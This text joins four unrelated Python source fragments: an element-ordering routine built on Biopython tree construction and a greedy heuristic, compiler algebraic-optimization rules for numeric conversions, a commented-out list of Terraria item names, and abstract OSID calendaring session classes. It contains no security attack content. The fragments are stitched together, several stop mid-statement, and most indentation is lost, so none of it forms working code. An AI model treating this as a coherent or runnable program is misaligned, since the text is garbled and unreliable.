if len(elements) == 1: return elements
for property in properties[:]:
nb = len(property_2_element_2_relation[property])
if nb <= 1: properties.remove(property) # Present for one element => does not influence best order
elif nb == len(elements): properties.remove(property) # Present for all elements => does not influence best order
def score_order(order):
nb_hole = 0
length = 0
for property in properties:
start = None
end = None
in_hole = False
for i, element in enumerate(order):
if in_hole: length += 1
if element in property_2_element_2_relation[property]:
if start is None: start = i
end = i
in_hole = False
else:
if (not start is None) and (not in_hole):
in_hole = True
nb_hole += property.weight or 1
if not end is None:
if end != i: nb_hole -= property.weight or 1 # After end, it is not a hole!
return -nb_hole
#return -length
if custom_score_order:
combined_score_order = lambda order: custom_score_order(order, score_order)
else:
combined_score_order = score_order
best_score = None
best_order = None
for order in all_orders(elements):
if filter_order and not filter_order(order): continue
score = combined_score_order(order)
if (best_score is None) or (score > best_score):
best_score = score
best_order = order
return best_order
def best_elements_order_tree(relations, elements = None, filter_order = None):
present_elements, present_element_groups, properties, property_groups, element_2_property_2_relation, property_2_element_2_relation = relations_2_model(relations)
if not elements: elements = present_elements
# distances = {}
# for e1 in elements:
# for e2 in elements:
# if (e1 is e2) or (id(e1) > id(e2)): continue
# nb_similarity = 0
# for property in properties[:]:
# if True == (e1 in property_2_element_2_relation[property]) == (e2 in property_2_element_2_relation[property]):
# nb_similarity += 2
# elif (e1 in property_2_element_2_relation[property]) == (e2 in property_2_element_2_relation[property]):
# nb_similarity += 1
# distances[e1, e2] = distances[e2, e1] = 1.0 - nb_similarity / len(properties)
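    # Distance between two elements = number of properties on which their membership
    # differs (a Hamming distance); it feeds the Biopython neighbour-joining tree below.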
distances = {}
for e1 in elements:
for e2 in elements:
if (e1 is e2) or (id(e1) > id(e2)): continue
d = 0
for property in properties[:]:
if (e1 in property_2_element_2_relation[property]) != (e2 in property_2_element_2_relation[property]):
d += 1.0
distances[e1, e2] = distances[e2, e1] = d
label_2_element = { element.label : element for element in elements }
from Bio.Phylo.TreeConstruction import _DistanceMatrix as DistanceMatrix, DistanceTreeConstructor
dm = DistanceMatrix([element.label for element in elements])
for e1 in elements:
for e2 in elements:
if (e1 is e2) or (id(e1) > id(e2)): continue
dm[e1.label, e2.label] = distances[e1, e2]
print(dm, file = sys.stderr)
treebuilder = DistanceTreeConstructor(None)
tree = treebuilder.nj(dm)
#tree = treebuilder.upgma(dm)
print(tree, file = sys.stderr)
def walker(clade):
if clade.clades:
results = []
partss = [walker(child) for child in clade.clades]
for ordered_parts in all_orders(partss):
combinations = all_combinations(ordered_parts)
results.extend(combinations)
return results
else:
element = label_2_element[clade.name]
return [ [element] ]
orders = walker(tree.root)
print(len(orders), file = sys.stderr)
def score_order(order):
nb_hole = 0
nb_prop_with_hole = 0
total_hole_length = 0
for property in properties:
start = None
end = None
in_hole = False
for i, element in enumerate(order):
if element in property_2_element_2_relation[property]:
if start is None: start = i
end = i
in_hole = False
else:
if (not start is None) and (not in_hole):
in_hole = True
nb_hole += 1
# After end, it is not a hole!
if end != i: nb_hole -= 1
if not end is None:
length = end - start + 1
if length > len(property_2_element_2_relation[property]):
total_hole_length += length - len(property_2_element_2_relation[property])
nb_prop_with_hole += 1
return (-nb_prop_with_hole, -nb_hole * 2 + -total_hole_length)
order, score = best(orders, score_order, score0 = (-sys.maxsize, -sys.maxsize))
return order
def best_elements_order_heuristic(relations, elements = None, filter_order = None):
present_elements, present_element_groups, properties, property_groups, element_2_property_2_relation, property_2_element_2_relation = relations_2_model(relations)
if not elements: elements = present_elements
elements = set(elements)
for e in elements:
        if not e in element_2_property_2_relation: element_2_property_2_relation[e] = {} # Elements with no relations are not present
    for p in properties:
        if not p in property_2_element_2_relation: property_2_element_2_relation[p] = {} # Properties with no relations are not present
# This is the heuristic algorithm published, with a few additional optimizations (commented below).
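    # Outline of the implementation below: seed partial orders with the elements
    # having the most shared relations, then repeatedly grow each partial order by
    # inserting one remaining element at either end, keeping only the insertions
    # with the best local score (properties shared with the new neighbour, plus
    # properties whose elements can still be placed contiguously later).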
def get_number_of_relation(e0):
return len([prop for prop in element_2_property_2_relation[e0] if len(property_2_element_2_relation[prop]) > 1])
candidate_first_elements, best_score = bests(elements, get_number_of_relation)
orders_being_constructed = { (e0,) for e0 in candidate_first_elements }
partial_orders_already_processed = set()
candidate_orders = set()
properties_with_more_than_one_element = [
property for property in properties
if len(property_2_element_2_relation[property]) > 1
]
def insertion_score(element, position, order):
if position is "beginning": neighbor = order[ 0]
elif position is "end": neighbor = order[-1]
score = 0
for x in element_2_property_2_relation[element]:
if x in element_2_property_2_relation[neighbor]: score += 2
for y in properties_with_more_than_one_element:
if ((not y in element_2_property_2_relation[element]) and
set(property_2_element_2_relation[y]).isdisjoint(order)): score += 1
#remnants = set(elements) - set(order)
#for x in element_2_property_2_relation[neighbor]:
# if not x in element_2_property_2_relation[element]:
# for remnant in remnants:
# if x in element_2_property_2_relation[remnant]:
# score -= 1
# break
return score
while orders_being_constructed:
#print(len(orders_being_constructed), file = sys.stderr)
order = orders_being_constructed.pop()
remnant = elements.difference(order)
possible_insertions = { (e, "beginning") for e in remnant } | { (e, "end") for e in remnant }
choosen_insertions, best_score = bests(possible_insertions, lambda pair: insertion_score(pair[0], pair[1], order))
already = set()
for (e, position) in choosen_insertions:
# Additional optimization (not in the published algorithm):
# for elements with identical set membership,
# test only one of them
key = (position, frozenset(element_2_property_2_relation[e]))
if key in already: continue
already.add(key)
if position == "beginning": new_order = (e,) + order
elif position == "end": new_order = order + (e,)
if len(new_order) == len(elements):
candidate_orders.add(new_order)
else:
if not new_order in partial_orders_already_processed:
# Additional optimization (not in the published algorithm):
# do not add in orders_being_constructed
| |
    # These derive from the previous patterns with the application of b < 0 <=>
# 0 < -b. The transformation should be applied if either comparison is
# used once as this ensures that the number of comparisons will not
# increase. The sources to the ior and iand are not symmetric, so the
# rules have to be duplicated to get this behavior.
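    # For example, (0 < a) || (b < 0) becomes 0 < fmax(a, -b), and
    # (0 < a) && (b < 0) becomes 0 < fmin(a, -b).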
(('ior', ('flt(is_used_once)', 0.0, 'a@{}'.format(s)), ('flt', 'b@{}'.format(s), 0.0)), ('flt', 0.0, ('fmax', a, ('fneg', b)))),
(('ior', ('flt', 0.0, 'a@{}'.format(s)), ('flt(is_used_once)', 'b@{}'.format(s), 0.0)), ('flt', 0.0, ('fmax', a, ('fneg', b)))),
(('ior', ('fge(is_used_once)', 0.0, 'a@{}'.format(s)), ('fge', 'b@{}'.format(s), 0.0)), ('fge', 0.0, ('fmin', a, ('fneg', b)))),
(('ior', ('fge', 0.0, 'a@{}'.format(s)), ('fge(is_used_once)', 'b@{}'.format(s), 0.0)), ('fge', 0.0, ('fmin', a, ('fneg', b)))),
(('~iand', ('flt(is_used_once)', 0.0, 'a@{}'.format(s)), ('flt', 'b@{}'.format(s), 0.0)), ('flt', 0.0, ('fmin', a, ('fneg', b)))),
(('~iand', ('flt', 0.0, 'a@{}'.format(s)), ('flt(is_used_once)', 'b@{}'.format(s), 0.0)), ('flt', 0.0, ('fmin', a, ('fneg', b)))),
(('~iand', ('fge(is_used_once)', 0.0, 'a@{}'.format(s)), ('fge', 'b@{}'.format(s), 0.0)), ('fge', 0.0, ('fmax', a, ('fneg', b)))),
(('~iand', ('fge', 0.0, 'a@{}'.format(s)), ('fge(is_used_once)', 'b@{}'.format(s), 0.0)), ('fge', 0.0, ('fmax', a, ('fneg', b)))),
# The (i2f32, ...) part is an open-coded fsign. When that is combined
# with the bcsel, it's basically copysign(1.0, a). There are some
# behavior differences between this pattern and copysign w.r.t. ±0 and
# NaN. copysign(x, y) blindly takes the sign bit from y and applies it
# to x, regardless of whether either or both values are NaN.
#
# If a != a: bcsel(False, 1.0, i2f(b2i(False) - b2i(False))) = 0,
# int(NaN >= 0.0) - int(NaN < 0.0) = 0 - 0 = 0
# If a == ±0: bcsel(True, 1.0, ...) = 1.0,
# int(±0.0 >= 0.0) - int(±0.0 < 0.0) = 1 - 0 = 1
#
# For all other values of 'a', the original and replacement behave as
# copysign.
#
# Marking the replacement comparisons as precise prevents any future
# optimizations from replacing either of the comparisons with the
# logical-not of the other.
#
# Note: Use b2i32 in the replacement because some platforms that
# support fp16 don't support int16.
(('bcsel@{}'.format(s), ('feq', a, 0.0), 1.0, ('i2f{}'.format(s), ('iadd', ('b2i{}'.format(s), ('flt', 0.0, 'a@{}'.format(s))), ('ineg', ('b2i{}'.format(s), ('flt', 'a@{}'.format(s), 0.0)))))),
('i2f{}'.format(s), ('iadd', ('b2i32', ('!fge', a, 0.0)), ('ineg', ('b2i32', ('!flt', a, 0.0)))))),
    (('bcsel', a, ('b2f(is_used_once)', 'b@{}'.format(s)), ('b2f', 'c@{}'.format(s))), ('b2f', ('bcsel', a, b, c))),
# The C spec says, "If the value of the integral part cannot be represented
# by the integer type, the behavior is undefined." "Undefined" can mean
# "the conversion doesn't happen at all."
(('~i2f{}'.format(s), ('f2i', 'a@{}'.format(s))), ('ftrunc', a)),
# Ironically, mark these as imprecise because removing the conversions may
# preserve more precision than doing the conversions (e.g.,
# uint(float(0x81818181u)) == 0x81818200).
(('~f2i{}'.format(s), ('i2f', 'a@{}'.format(s))), a),
(('~f2i{}'.format(s), ('u2f', 'a@{}'.format(s))), a),
(('~f2u{}'.format(s), ('i2f', 'a@{}'.format(s))), a),
(('~f2u{}'.format(s), ('u2f', 'a@{}'.format(s))), a),
(('fadd', ('b2f{}'.format(s), ('flt', 0.0, 'a@{}'.format(s))), ('fneg', ('b2f{}'.format(s), ('flt', 'a@{}'.format(s), 0.0)))), ('fsign', a), '!options->lower_fsign'),
(('iadd', ('b2i{}'.format(s), ('flt', 0, 'a@{}'.format(s))), ('ineg', ('b2i{}'.format(s), ('flt', 'a@{}'.format(s), 0)))), ('f2i{}'.format(s), ('fsign', a)), '!options->lower_fsign'),
    ])
    optimizations.extend([
       # float? -> float? -> floatS ==> float? -> floatS
       (('~f2f{}'.format(s), ('f2f', a)), ('f2f{}'.format(s), a)),
       # int? -> float? -> floatS ==> int? -> floatS
       (('~f2f{}'.format(s), ('u2f', a)), ('u2f{}'.format(s), a)),
       (('~f2f{}'.format(s), ('i2f', a)), ('i2f{}'.format(s), a)),
       # float? -> float? -> intS ==> float? -> intS
       (('~f2u{}'.format(s), ('f2f', a)), ('f2u{}'.format(s), a)),
       (('~f2i{}'.format(s), ('f2f', a)), ('f2i{}'.format(s), a)),
    ])
for B in [32, 64]:
if s < B:
optimizations.extend([
# S = smaller, B = bigger
# typeS -> typeB -> typeS ==> identity
(('f2f{}'.format(s), ('f2f{}'.format(B), 'a@{}'.format(s))), a),
(('i2i{}'.format(s), ('i2i{}'.format(B), 'a@{}'.format(s))), a),
(('u2u{}'.format(s), ('u2u{}'.format(B), 'a@{}'.format(s))), a),
# bool1 -> typeB -> typeS ==> bool1 -> typeS
(('f2f{}'.format(s), ('b2f{}'.format(B), 'a@1')), ('b2f{}'.format(s), a)),
(('i2i{}'.format(s), ('b2i{}'.format(B), 'a@1')), ('b2i{}'.format(s), a)),
(('u2u{}'.format(s), ('b2i{}'.format(B), 'a@1')), ('b2i{}'.format(s), a)),
# floatS -> floatB -> intB ==> floatS -> intB
(('f2u{}'.format(B), ('f2f{}'.format(B), 'a@{}'.format(s))), ('f2u{}'.format(B), a)),
(('f2i{}'.format(B), ('f2f{}'.format(B), 'a@{}'.format(s))), ('f2i{}'.format(B), a)),
# int? -> floatB -> floatS ==> int? -> floatS
(('f2f{}'.format(s), ('u2f{}'.format(B), a)), ('u2f{}'.format(s), a)),
(('f2f{}'.format(s), ('i2f{}'.format(B), a)), ('i2f{}'.format(s), a)),
# intS -> intB -> floatB ==> intS -> floatB
(('u2f{}'.format(B), ('u2u{}'.format(B), 'a@{}'.format(s))), ('u2f{}'.format(B), a)),
(('i2f{}'.format(B), ('i2i{}'.format(B), 'a@{}'.format(s))), ('i2f{}'.format(B), a)),
])
# mediump variants of the above
optimizations.extend([
# int32 -> float32 -> float16 ==> int32 -> float16
(('f2fmp', ('u2f32', 'a@32')), ('u2fmp', a)),
(('f2fmp', ('i2f32', 'a@32')), ('i2fmp', a)),
# float32 -> float16 -> int16 ==> float32 -> int16
(('f2u16', ('f2fmp', 'a@32')), ('f2u16', a)),
(('f2i16', ('f2fmp', 'a@32')), ('f2i16', a)),
# float32 -> int32 -> int16 ==> float32 -> int16
(('i2imp', ('f2u32', 'a@32')), ('f2ump', a)),
(('i2imp', ('f2i32', 'a@32')), ('f2imp', a)),
# int32 -> int16 -> float16 ==> int32 -> float16
(('u2f16', ('i2imp', 'a@32')), ('u2f16', a)),
(('i2f16', ('i2imp', 'a@32')), ('i2f16', a)),
])
# Integer sizes
for s in [8, 16, 32, 64]:
optimizations.extend([
(('iand', ('ieq', 'a@{}'.format(s), 0), ('ieq', 'b@{}'.format(s), 0)), ('ieq', ('ior', a, b), 0), 'options->lower_umax'),
(('ior', ('ine', 'a@{}'.format(s), 0), ('ine', 'b@{}'.format(s), 0)), ('ine', ('ior', a, b), 0), 'options->lower_umin'),
(('iand', ('ieq', 'a@{}'.format(s), 0), ('ieq', 'b@{}'.format(s), 0)), ('ieq', ('umax', a, b), 0), '!options->lower_umax'),
(('ior', ('ieq', 'a@{}'.format(s), 0), ('ieq', 'b@{}'.format(s), 0)), ('ieq', ('umin', a, b), 0), '!options->lower_umin'),
(('iand', ('ine', 'a@{}'.format(s), 0), ('ine', 'b@{}'.format(s), 0)), ('ine', ('umin', a, b), 0), '!options->lower_umin'),
(('ior', ('ine', 'a@{}'.format(s), 0), ('ine', 'b@{}'.format(s), 0)), ('ine', ('umax', a, b), 0), '!options->lower_umax'),
# True/False are ~0 and 0 in NIR. b2i of True is 1, and -1 is ~0 (True).
(('ineg', ('b2i{}'.format(s), 'a@{}'.format(s))), a),
# SM5 32-bit shifts are defined to use the 5 least significant bits (or 4 bits for 16 bits)
(('ishl', 'a@{}'.format(s), ('iand', s - 1, b)), ('ishl', a, b)),
(('ishr', 'a@{}'.format(s), ('iand', s - 1, b)), ('ishr', a, b)),
(('ushr', 'a@{}'.format(s), ('iand', s - 1, b)), ('ushr', a, b)),
])
optimizations.extend([
# Common pattern like 'if (i == 0 || i == 1 || ...)'
(('ior', ('ieq', a, 0), ('ieq', a, 1)), ('uge', 1, a)),
(('ior', ('uge', 1, a), ('ieq', a, 2)), ('uge', 2, a)),
(('ior', ('uge', 2, a), ('ieq', a, 3)), ('uge', 3, a)),
(('ior', a, ('ieq', a, False)), True),
(('ior', a, ('inot', a)), -1),
(('ine', ('ineg', ('b2i', 'a@1')), ('ineg', ('b2i', 'b@1'))), ('ine', a, b)),
(('b2i', ('ine', 'a@1', 'b@1')), ('b2i', ('ixor', a, b))),
  # This pattern occurs courtesy of __flt64_nonnan in the soft-fp64 code.
# The first part of the iand comes from the !__feq64_nonnan.
#
# The second pattern is a reformulation of the first based on the relation
# (a == 0 || y == 0) <=> umin(a, y) == 0, where b in the first equation
# happens to be y == 0.
(('iand', ('inot', ('iand', ('ior', ('ieq', a, 0), b), c)), ('ilt', a, 0)),
('iand', ('inot', ('iand', b , c)), ('ilt', a, 0))),
(('iand', ('inot', ('iand', ('ieq', ('umin', a, b), 0), c)), ('ilt', a, 0)),
('iand', ('inot', ('iand', ('ieq', b , 0), c)), ('ilt', a, 0))),
# These patterns can result when (a < b || a < c) => (a < min(b, c))
# transformations occur before constant propagation and loop-unrolling.
(('~flt', a, ('fmax', b, a)), ('flt', a, b)),
(('~flt', ('fmin', a, b), a), ('flt', b, a)),
(('~fge', a, ('fmin', b, a)), True),
(('~fge', ('fmax', a, b), a), True),
(('~flt', a, ('fmin', b, a)), False),
(('~flt', ('fmax', a, b), a), False),
(('~fge', a, ('fmax', b, a)), ('fge', a, b)),
(('~fge', ('fmin', a, b), a), ('fge', b, a)),
(('ilt', a, ('imax', b, a)), ('ilt', a, b)),
(('ilt', ('imin', a, b), a), ('ilt', b, a)),
(('ige', a, ('imin', b, a)), True),
(('ige', ('imax', a, b), a), True),
(('ult', a, ('umax', b, a)), ('ult', a, b)),
(('ult', ('umin', a, b), a), ('ult', b, a)),
(('uge', a, ('umin', b, a)), True),
(('uge', ('umax', a, b), a), True),
(('ilt', a, ('imin', b, a)), False),
(('ilt', ('imax', a, b), a), False),
(('ige', a, ('imax', b, a)), ('ige', a, b)),
(('ige', ('imin', a, b), a), ('ige', b, a)),
(('ult', a, ('umin', b, a)), False),
(('ult', ('umax', a, b), a), False),
(('uge', a, ('umax', b, a)), ('uge', a, b)),
(('uge', ('umin', a, b), a), ('uge', b, a)),
  (('ult',
# "Marble Table": "",
# "Granite Table": "",
# "Meteorite Work Bench": "",
# "Marble Work Bench": "",
# "Granite Work Bench": "",
# "Meteorite Bathtub": "",
# "Marble Bathtub": "",
# "Granite Bathtub": "",
# "Meteorite Bed": "",
# "Marble Bed": "",
# "Granite Bed": "",
# "Meteorite Bookcase": "",
# "Marble Bookcase": "",
# "Granite Bookcase": "",
# "Meteorite Candelabra": "",
# "Marble Candelabra": "",
# "Granite Candelabra": "",
# "Meteorite Candle": "",
# "Marble Candle": "",
# "Granite Candle": "",
# "Meteorite Chair": "",
# "Marble Chair": "",
# "Granite Chair": "",
# "Meteorite Chandelier": "",
# "Marble Chandelier": "",
# "Granite Chandelier": "",
# "Meteorite Chest": "",
# "Marble Chest": "",
# "Magic Water Dropper": "",
# "Golden Bug Net": "",
# "Magic Lava Dropper": "",
# "Magic Honey Dropper": "",
# "Empty Dropper": "",
# "Gladiator Helmet": "",
# "Gladiator Breastplate": "",
# "Gladiator Leggings": "",
# "Reflective Dye": "",
# "Enchanted Nightcrawler": "",
# "Grubby": "",
# "Sluggy": "",
# "Buggy": "",
# "Grub Soup": "",
# "Bomb Fish": "",
# "Frost Daggerfish": "",
# "Sharpening Station": "",
# "Ice Mirror": "",
# "Sailfish Boots": "",
# "Tsunami in a Bottle": "",
# "Target Dummy": "",
# "Corrupt Crate": "",
# "Crimson Crate": "",
# "Dungeon Crate": "",
# "Sky Crate": "",
# "Hallowed Crate": "",
# "Jungle Crate": "",
# "Crystal Serpent": "",
# "Toxikarp": "",
# "Bladetongue": "",
# "Shark Tooth Necklace": "",
# "Money Trough": "",
# "Bubble": "",
# "Daybloom Planter Box": "",
# "Moonglow Planter Box": "",
# "Deathweed Planter Box": "",
# "Blinkroot Planter Box": "",
# "Waterleaf Planter Box": "",
# "Shiverthorn Planter Box": "",
# "Fireblossom Planter Box": "",
# "Brain of Confusion": "",
# "Worm Scarf": "",
# "Balloon Pufferfish": "",
# "Lazure's Valkyrie Circlet: "","
# "Lazure's Valkyrie Cloak": "",
# "Lazure's Barrier Platform": "",
# "Golden Cross Grave Marker: "","
# "Golden Tombstone": "",
# "Golden Grave Marker": "",
# "Golden Gravestone": "",
# "Golden Headstone": "",
# "Crystal Block": "",
# "Music Box (Martian Madnes)": "",
# "Music Box (Pirate Invasion)": "",
# "Music Box (Hell)": "",
# "Crystal Block Wall": "",
# "Trap Door": "",
# "Tall Gate": "",
# "Sharkron Balloon": "",
# "Tax Collector's Hat": "",
# "Tax Collector's Suit": "",
# "Tax Collector's Pants": "",
# "Bone Glove": "",
# "Clothier's Jacket": "",
# "Clothier's Pants": "",
# "Dye Trader's Turban": "",
# "Deadly Sphere Staff": "",
# "Green Horseshoe Balloon": "",
# "Amber Horseshoe Balloon": "",
# "Pink Horseshoe Balloon": "",
# "Lava Lamp": "",
# "Enchanted Nightcrawler Cage": "",
# "Buggy Cage": "",
# "Grubby Cage": "",
# "Sluggy Cage": "",
# "Slap Hand": "",
# "Twilight Hair Dye": "",
# "Blessed Apple": "",
# "Spectre Bar": "",
# "Code 1": "",
# "Buccaneer Bandana": "",
# "Buccaneer Tunic": "",
# "Buccaneer Pantaloons": "",
# "Obsidian Outlaw Hat": "",
# "Obsidian Longcoat": "",
# "Obsidian Pants": "",
# "Medusa Head": "",
# "Item Frame": "",
# "Sandstone Block": "",
# "Hardened Sand Block": "",
# "Sandstone Wall": "",
# "Hardened Ebonsand Block": "",
# "Hardened Crimsand Block": "",
# "Ebonsandstone Block": "",
# "Crimsandstone Block": "",
# "Wooden Yoyo": "",
# "Malaise": "",
# "Artery": "",
# "Amazon": "",
# "Cascade": "",
# "Chik": "",
# "Code 2": "",
# "Rally": "",
# "Yelets": "",
# "Red's Throw": "",
# "Valkyrie Yoyo": "",
# "Amarok": "",
# "Hel-Fire": "",
# "Kraken": "",
# "The Eye of Cthulhu": "",
# "Red String": "",
# "Orange String": "",
# "Yellow String": "",
# "Lime String": "",
# "Green String": "",
# "Teal String": "",
# "Cyan String": "",
# "Sky Blue String": "",
# "Blue String": "",
# "Purple String": "",
# "Violet String": "",
# "Pink String": "",
# "Brown String": "",
# "White String": "",
# "Rainbow String": "",
# "Black String": "",
# "Black Counterweight": "",
# "Blue Counterweight": "",
# "Green Counterweight": "",
# "Purple Counterweight": "",
# "Red Counterweight": "",
# "Yellow Counterweight": "",
# "Format C": "",
# "Gradient": "",
# "Valor": "",
# "Hive Pack": "",
# "Yoyo Glove": "",
# "Demon Heart": "",
# "Spore Sac": "",
# "Shiny Stone": "",
# "Hardened Pearlsand Block": "",
# "Pearlsandstone Block": "",
# "Hardened Sand Wall": "",
# "Hardened Ebonsand Wall": "",
# "Hardened Crimsand Wall": "",
# "Hardened Pearlsand Wall": "",
# "Ebonsandstone Wall": "",
# "Crimsandstone Wall": "",
# "Pearlsandstone Wall": "",
# "Desert Fossil": "",
# "Desert Fossil Wall": "",
# "Exotic Scimitar": "",
# "Paintball Gun": "",
# "Classy Cane": "",
# "Stylish Scissors": "",
# "Mechanical Cart": "",
# "Mechanical Wheel Piece": "",
# "Mechanical Wagon Piece": "",
# "Mechanical Battery Piece": "",
# "Ancient Cultist Trophy": "",
# "Martian Saucer Trophy": "",
# "Flying Dutchman Trophy": "",
# "Living Mahogany Wand": "",
# "Rich Mahogany Leaf Wand": "",
# "Fallen Tuxedo Shirt": "",
# "Fallen Tuxedo Pants": "",
# "Fireplace": "",
# "Chimney": "",
# "Yoyo Bag": "",
# "Shrimpy Truffle": "",
# "Arkhalis": "",
# "<NAME>": "",
# "Music Box (The Towers)": "",
# "Music Box (Goblin Invasion)": "",
# "Ancient Cultist Mask": "",
# "Moon Lord Mask": "",
# "Fossil Helmet": "",
# "Fossil Plate": "",
# "Fossil Greaves": "",
# "Amber Staff": "",
# "Bone Javelin": "",
# "Bone Throwing Knife": "",
# "Sturdy Fossil": "",
# "Stardust Helmet": "",
# "Stardust Plate": "",
# "Stardust Leggings": "",
# "Portal Gun": "",
# "Terrarian": "",
# "Goblin Summoner Banner": "",
# "Salamander Banner": "",
# "Giant Shelly Banner": "",
# "Crawdad Banner": "",
# "Fritz Banner": "",
# "Creature from the Deep Banner": "",
# "Dr. Man Fly Banner": "",
# "Mothron Banner": "",
# "Severed Hand Banner": "",
# "The Possessed Banner": "",
# "Butcher Banner": "",
# "Psycho Banner": "",
# "Deadly Sphere Banner": "",
# "Nailhead Banner": "",
# "Poisonous Spore Banner": "",
# "Medusa Banner": "",
# "Hoplite Banner": "",
# "Granite Elemental Banner": "",
# "Grolem Banner": "",
# "Blood Zombie Banner": "",
# "Drippler Banner": "",
# "Tomb Crawler Banner": "",
# "Dune Splicer Banner": "",
# "Antlion Swarmer Banner": "",
# "Antlion Charger Banner": "",
# "Ghoul Banner": "",
# "Lamia Banner": "",
# "Desert Spirit Banner": "",
# "Basilisk Banner": "",
# "Ravager Scorpion Banner": "",
# "Stargazer Banner": "",
# "Milkyway Weaver Banner": "",
# "Flow Invader Banner": "",
# "Twinkle Popper Banner": "",
# "Small Star Cell Banner": "",
# "Star Cell Banner": "",
# "Corite Banner": "",
# "Sroller Banner": "",
# "Crawltipede Banner": "",
# "Drakomire Rider Banner": "",
# "Drakomire Banner": "",
# "Selenian Banner": "",
# "Predictor Banner": "",
# "Brain Suckler Banner": "",
# "Nebula Floater Banner": "",
# "Evolution Beast Banner": "",
# "Alien Larva Banner": "",
# "Alien Queen Banner": "",
# "Alien Hornet Banner": "",
# "Vortexian Banner": "",
# "Storm Diver Banner": "",
# "Pirate Captain Banner": "",
# "Pirate Deadeye Banner": "",
# "Pirate Corsair Banner": "",
# "Pirate Crossbower Banner": "",
# "Martian Walker Banner": "",
# "Red Devil Banner": "",
# "Pink Jellyfish Banner": "",
# "Green Jellyfish Banner": "",
# "Dark Mummy Banner": "",
# "Light Mummy Banner": "",
# "Angry Bones Banner": "",
# "Ice Tortoise Banner": "",
# "Damage Booster": "",
# "Life Booster": "",
# "Mana Booster": "",
# "Vortex Fragment": "",
# "Nebula Fragment": "",
# "Solar Fragment": "",
# "Stardust Fragment": "",
# "Luminite": "",
# "Luminite Brick": "",
# "Stardust Axe": "",
# "Stardust Chainsaw": "",
# "Stardust Drill": "",
# "Stardust Hammer": "",
# "Stardust Pickaxe": "",
# "Luminite Bar": "",
# "Solar Wings": "",
# "Vortex Booster": "",
# "Nebula Mantle": "",
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
def get_offset_events(self):
"""Gets all ``OffsetEvents``.
:return: an ``OffsetEventList``
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
offset_events = property(fget=get_offset_events)
class OffsetEventQuerySession:
"""This session provides methods for searching ``OffsetEvent`` objects.
The search query is constructed using the ``OffsetEventQuery``. The
offset event record ``Type`` also specifies the record for the
offset event query.
This session defines views that offer differing behaviors for
searching.
* federated calendar view: searches include offset events in
calendars of which this calendar is an ancestor in the calendar
hierarchy
* isolated calendar view: searches are restricted to offset events
in this calendar
``OffsetEvents`` may have a query record indicated by their
respective record types. The query record is accessed via the
``OffsetEventQuery``.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_calendar_id(self):
"""Gets the ``Calendar`` ``Id`` associated with this session.
:return: the ``Calendar Id`` associated with this session
:rtype: ``osid.id.Id``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.id.Id
calendar_id = property(fget=get_calendar_id)
@abc.abstractmethod
def get_calendar(self):
"""Gets the ``Calendar`` associated with this session.
:return: the ``Calendar`` associated with this session
:rtype: ``osid.calendaring.Calendar``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.Calendar
calendar = property(fget=get_calendar)
@abc.abstractmethod
def can_search_offset_events(self):
"""Tests if this user can perform ``OffsetEvents`` searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
:return: ``false`` if search methods are not authorized, ``true`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def use_federated_calendar_view(self):
"""Federates the view for methods in this session.
A federated view will include offset events in calendars which
are children of this calendar in the calendar hierarchy.
*compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def use_isolated_calendar_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts searches to this calendar only.
*compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def get_offset_event_query(self):
"""Gets an offset event query.
:return: the offset event query
:rtype: ``osid.calendaring.OffsetEventQuery``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventQuery
offset_event_query = property(fget=get_offset_event_query)
@abc.abstractmethod
def get_offset_events_by_query(self, offset_event_query):
"""Gets a list of ``OffsetEvents`` matching the given offset event query.
:param offset_event_query: the offset event query
:type offset_event_query: ``osid.calendaring.OffsetEventQuery``
:return: the returned ``OffsetEventList``
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``offset_event_query`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
:raise: ``Unsupported`` -- ``offset_event_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
class OffsetEventSearchSession:
"""This session provides methods for searching ``OffsetEvent`` objects.
The search query is constructed using the ``OffsetEventQuery``. The
offset event record ``Type`` also specifies the record for the
offset event query.
``get_offset_events_by_query()`` is the basic search method and
returns a list of ``OffsetEvents``. A more advanced search may be
performed with ``getOffsetEventsBySearch()``. It accepts an
``OffsetEventSearch`` in addition to the query for the purpose of
specifying additional options affecting the entire search, such as
ordering. ``get_offset_events_by_search()`` returns an
``OffsetEventSearchResults`` that can be used to access the
resulting ``OffsetEventList`` or be used to perform a search within
the result set through ``OffsetEventSearch``.
This session defines views that offer differing behaviors for
searching.
* federated calendar view: searches include offset events in
calendars of which this calendar is an ancestor in the calendar
hierarchy
* isolated calendar view: searches are restricted to offset events
in this calendar
Offset events may have a query record indicated by their respective
record types. The query record is accessed via the
``OffsetEventQuery``.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_offset_event_search(self):
"""Gets an offset event search.
:return: the offset event search
:rtype: ``osid.calendaring.OffsetEventSearch``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventSearch
offset_event_search = property(fget=get_offset_event_search)
@abc.abstractmethod
def get_offset_event_search_order(self):
"""Gets an offset event search order.
The ``OffsetEventSearchOrder`` is supplied to an
``OffsetEventSearch`` to specify the ordering of results.
:return: the offset event search order
:rtype: ``osid.calendaring.OffsetEventSearchOrder``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventSearchOrder
offset_event_search_order = property(fget=get_offset_event_search_order)
